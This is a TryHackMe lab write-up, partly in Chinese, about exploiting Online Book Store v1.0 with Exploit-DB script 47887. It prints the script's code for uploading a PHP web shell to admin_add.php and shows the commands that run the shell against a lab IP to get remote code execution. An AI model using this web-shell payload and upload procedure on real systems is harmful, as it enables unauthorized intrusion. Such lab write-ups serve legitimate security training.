# Exploit Vulnerabilities ###### tags: `tryhackme` [TOC] ## Gathering Information ip 10.10.167.176 ### Nmap  firefox 10.10.20.249:80  The name and version number of the application ->Online Book Store v1.0 ### Exploit-DB  https://www.exploit-db.com/exploits/47887 這個腳本使用argparse模組來處理命令列參數 ```python parser = argparse.ArgumentParser() parser.add_argument('url', action='store', help='The URL of the target.') args = parser.parse_args() ``` 並使用requests模組來發送HTTP請求 使用POST請求將Web Shell上傳到應用程式的admin_add.php頁面 ```python url = args.url.rstrip('/') r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False) print('> Verifying shell upload...') ``` 腳本生成了一個隨機檔案名稱，並將其作為PHP Web Shell的檔案名稱保存。接著，腳本構造了一個簡單的PHP代碼，用於執行命令列參數中的命令。 ```python random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10)) payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>' file = {'image': (random_file + '.php', payload, 'text/php')} ``` Exploit Vulnerability LFI vulnerability ＋ upload vulnerability Exploit Flow ``` nano exploitRCEcode.py apt install pip pip install requests ``` ``` python3 exploitRCE.py -h python3 exploitRCE.py http://10.10.20.249 ```  http://10.10.20.249/bootstrap/img/MQVnWWS3cb.php?cmd=whoami RCE